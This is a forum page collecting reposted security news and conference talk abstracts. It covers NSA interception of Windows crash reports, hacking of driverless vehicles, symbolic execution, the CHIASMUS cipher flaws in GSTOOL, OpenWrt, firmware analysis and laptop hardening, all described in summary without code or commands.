  19. Why the NSA is happy when Windows crashes The latest Snowden leaks via Der Spiegel contain an interesting snippet: the NSA intercepts Windows crash reports en route from the user to Microsoft. “An internal presentation suggests it is NSA’s powerful XKeyscore spying tool that is used to fish these crash reports out of the massive sea of Internet traffic.” The NSA presentation even makes a joke of it, adapting the Microsoft error message to say, “This information may be intercepted by a foreign SIGINT system…” Frankly, I find the NSA sense of humour troubling rather than amusing These error messages, says Spiegel, provide “valuable insights into problems with a targeted person’s computer and, thus, information on security holes that might be exploitable for planting malware or spyware on the unwitting victim’s computer.” Really? Yes really. Websense coincidentally (?) published a report on this very problem yesterday, and will be presenting further findings at RSA 2014 in San Francisco (assuming anybody is still going). It says, One troubling thing we observed is Windows Error Reporting (a.k.a. Dr. Watson) predominantly sends out its crash logs in the clear. These error logs could ultimately allow eavesdroppers to map out vulnerable endpoints and gain a foothold within the network for more advanced penetration. Here’s more on why that’s a concern: 80 percent of all network connected PCs use it – that’s more than one billion endpoints worldwide Dr. Watson reports information that hackers commonly use to find and exploit weak systems such as OS, service pack and update versions Crashes are especially useful for attackers as they may pinpoint a new exploitable code flaw for a zero-day attack Information is also sent for common system events like plugging in a USB device Let’s see how long it takes for Microsoft to respond and start encrypting its error messages. Then the only problem will be in persuading us that it hasn’t simultaneously given NSA the key… Sursa: Why the NSA is happy when Windows crashes | Kevin Townsend
  20. Defcon 21 - Hacking Driverless Vehicles Description: Are driverless vehicles ripe for the hacking? Autonomous and unmanned systems are already patrolling our skies and oceans and being tested on our streets and highways. All trends indicate these systems are at an inflection point that will show them rapidly becoming commonplace. It is therefore a salient time for a discussion of the capabilities and potential vulnerabilities of these systems. This session will be an informative and light-hearted look at the current state of civil driverless vehicles and what hackers or miscreants might do to mess with them. Topics covered will include common sensors, decision profiles and their potential failure modes that could be exploited. With this talk Zoz aims to both inspire unmanned vehicle fans to think about robustness to adversarial and malicious scenarios, and to give the paranoid false hope of resisting the robot revolution. He will also present details of how students can get involved in the ultimate sports events for robot hacking, the autonomous vehicle competitions. Zoz is a robotics interface designer and rapid prototyping specialist. He is a co-founder of Cannytrophic Design in Boston and CTO of BlueSky in San Francisco. As co-host of the Discovery Channel show 'Prototype This!' he pioneered urban pizza delivery with robotic vehicles, including the first autonomous crossing of an active highway bridge in the USA, and airborne delivery of life preservers at sea from an autonomous aircraft. He also hosts the annual AUVSI Foundation student autonomous robot competitions such as Roboboat and Robosub. For More Information please visit : - https://www.defcon.org/html/defcon-21/dc-21-speakers.html Sursa: Defcon 21 - Hacking Driverless Vehicles
  21. [h=1]Triggering Deep Vulnerabilities Using Symbolic Execution [30c3][/h] Triggering Deep Vulnerabilities Using Symbolic Execution Deep program analysis without the headache Symbolic Execution (SE) is a powerful way to analyze programs. Instead of using concrete data values SE uses symbolic values to evaluate a large set of parallel program paths at once. A drawback of many systems is that they need source code access and only scale to few lines of code. This talk explains how SE and binary analysis can be used to (i) reverse-engineer components of binary only applications and (ii) construct specific concrete input that triggers a given condition deep inside the application (think of defining an error condition and the SE engine constructs the input to the application that triggers the error). Analysis and reverse engineering of binary programs is cumbersome. Consider the problem that we have a given interesting (error) condition inside the program that we want to trigger. How can we generate a specific input to the program that, during the execution of the program, will trigger the condition. In this talk we use a combination of binary analysis techniques that recover high-level control-flow and data-flow information from a binary-only application and Symbolic Execution (SE) to automate the analysis of such problems. Existing SE tools have often been used to achieve high coverage across all code paths in an application to find implementation bugs. We use SE for a different purpose; given a vulnerability condition hidden deep inside the application what is the input that triggers that condition. We tackle the given problem in three major steps: (i) gathering information about the binary, (ii) analyzing the information-flow and control-flow of the binary, and (iii) using symbolic execution to generate a specific input example that triggers the specified condition. During the information gathering process we define the interesting condition and use regular analysis techniques to set-up later stages. In the information-flow and control-flow analysis we use a given sample input to collect a complete execution trace of the application that is then parsed into a graph that dissects the computation of the application into individual components. The last steps uses fuzzBall, our open-source SE engine to compute specific vulnerability-triggering inputs for the identified components. To evaluate our technique we will show several examples using real programs, showing how we can use specific vulnerability conditions to automatically generate input that triggers this condition. In addition, we will show how our SE engine can be used for other interesting analysis on binary only applications. Our tools are available as open-source and we invite other hackers to join in on this project. Speaker: gannimo EventID: 5224 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by
  22. [h=1]Reverse engineering of CHIASMUS from GSTOOL [30c3][/h] Reverse engineering of CHIASMUS from GSTOOL It hurts. We reverse-engineered one implementation of the non-public CHIASMUS cipher designed by the German Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnik, short BSI). This did not only give us some insight on the cipher, but also uncovered serious implementation issues in GSTOOL which allow attackers to crack files encrypted with the GSTOOL encryption function with very little effort. In the dark ages of digital cryptography, when ciphers were considered export-controlled munitions and AES was not yet standardized, the German Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnik, short BSI) decided to invent their own ciphers: CHIASMUS for software implementations and LIBELLE, which would be kept secret and only implemented in hardware. CHIASMUS is not publicly documented. It is implemented in a software tool of the same name, released by the BSI, which is only available where there is a public interest for its use. However, the GSTOOL, a database application for security audit management also released by the BSI, contains an encryption feature using the CHIASMUS block cipher, and is freely available. This software was developed by a third party, Steria Mummert Consulting, and apparently was not properly reviewed. We disassembled and analyzed the GSTOOL to obtain the specification for the encrypted files (and thus the CHIASMUS cipher itself), but we got more than we bargained for. While the cipher itself appears to be pretty secure, the implementation is a collection of rookie mistakes and a great example of what can (and will) go wrong if you ask people with little understanding of cryptography to build cryptographic software and don't verify their results. We invite you to enjoy this thriller full of historic backgrounds, non-public public announcements, legal threats, weapons-grade stupidity, and a very simple solution for complex crypotographic problems. Facepalm with us on the two-year long hunt for the elusive security patch! Have a look at the (not-so-secret-anymore) CHIASMUS block cipher! Learn why you should not build your own crypto tools unless you really know what you are doing, even if you use a known algorithm. And what happens when government contractors attempt to do so. And then attempt to fix it. (Note: Since this is an implementation issue, the stand-alone Chiasmus software tool is not affected by this issue.) Speaker: Jan Schejbal EventID: 5307 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by
  23. [h=1]10 Years of Fun with Embedded Devices [30c3][/h] 10 Years of Fun with Embedded Devices How OpenWrt evolved from a WRT54G firmware to an universal Embedded Linux OS A review of the 10 year history of the OpenWrt project, current events, and upcoming developments. This year we are celebrating ten years of OpenWrt and a long time has passed and a lot has happend since people first started hacking on devices like the WRT54G. Both the hardware and the software landscape has completely changed since then. In this talk we would like to take the chance, together with the audience, to look back on how the OpenWrt distribution did evolve over time and how it has changed its goals, its processes and its software stack. We will show examples of the current state-of-the-art, invite guests on stage, display things to come. And in general, celebrate that 10 years have passed and that many more are to come. The talk will start by looking back into the ancient history of OpenWrt - how it all got started - continue to the present time and give an overview of current and recent developments and then finish with an outlook onto future changes. During the talk we will look at the politics of what we have learned, what we think is broken in the CPE market, and how OpenWrt can help to change this. OpenWrt has, over the course of the past 10 years, created a territory of its own, a territory situated in a landscape criscrossed by relations, friction and interconnections. It is a journey that on its way created an universal embedded Linux operating system. OpenWrt is one of many islands in the Net which thrives by giving away its work to friends, associates and all those many people we don't know. All this is a good reason to celebrate and the talk will finish with beer, exotic drinks and more fun to come. Speaker: nbd EventID: 5497 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by
  24. [h=1]An introduction to Firmware Analysis [30c3][/h] An introduction to Firmware Analysis Techniques - Tools - Tricks This talk gives an introduction to firmware analysis: It starts with how to retrieve the binary, e.g. get a plain file from manufacturer, extract it from an executable or memory device, or even sniff it out of an update process or internal CPU memory, which can be really tricky. After that it introduces the necessary tools, gives tips on how to detect the processor architecture, and explains some more advanced analysis techniques, including how to figure out the offsets where the firmware is loaded to, and how to start the investigation. The talk focuses on the different steps to be taken to acquire and analyze the firmware of an embedded device, especially without knowing anything about the processor architecture in use. Frequently datasheets are not available or do not name any details about the used processor or System on Chip (SoC). First the prerequisites, like knowledge about the device under investigation, the ability to read assembly language, and the tools of the trade for acquisition and analysis, are shown. The question "How do I get the firmware out of device X?" makes the next big chapter: From easy to hard we pass through the different kinds of storage systems and locations a firmware can be stored to, the different ways the firmware gets transferred onto the device, and which tools we can use to retrieve the firmware from where it resides. The next step is to analyze the gathered data. Is it compressed in any way? For which of the various different processor architectures out there was it compiled for? Once we successfully figured out the CPU type and we've found a matching disassembler, where do we start to analyze the code? Often we have to find out the offset where the firmware is loaded to, to get an easy-to-analyze disassembler output. A technique to identify these offsets will be shown. The last chapter covers the modifications we can apply to the firmware, and what types of checksum mechanisms are known to be used by the device or the firmware itself to check the integrity of the code. Speaker: Stefan Widmann EventID: 5477 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by
  25. [h=1]Hardening hardware and choosing a #goodBIOS [30c3][/h] ex=15Hardening hardware and choosing a #goodBIOS Clean boot every boot - rejecting persistence of malicious software and tripping up the evil maid A commodity laptop is analyzed to identify exposed attack surfaces and is then secured on both the hardware and the firmware level against permanent modifications by malicious software as well as quick drive-by hardware attacks by evil maids, ensuring that the machine always powers up to a known good state and significantly raising the bar for an attacker who wants to use the machine against its owner. Commodity computers by design include attack vectors that allow malicious software and attackers who gain brief physical access, so-called evil maids, to take full control over the machine without the owner ever noticing. The presentation briefly enumerates well-known attacks such as remote DMA over IEEE1349/FireWire, BIOS bootkits, AMT and closed source operating system updates to arrive at a problem statement, and moves on in search of solutions which can block the attacks completely or at least hinder them from becoming persistent, starting a layer below them all; with the schematic of a laptop mainboard. A few relatively simple hardware modifications are identified, which together with the coreboot #goodBIOS firmware prevent two entire classes of attacks. The result is a machine which always powers up in a known good state and which must be under attacker control for 20 minutes in order to be compromised, rather than just 20 seconds. In closing the presentation starts a discussion about what we can do to address this problem, which exists in every single computer on the market, on a larger scale. Speaker: Peter Stuge EventID: 5529 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by
×
×
  • Create New...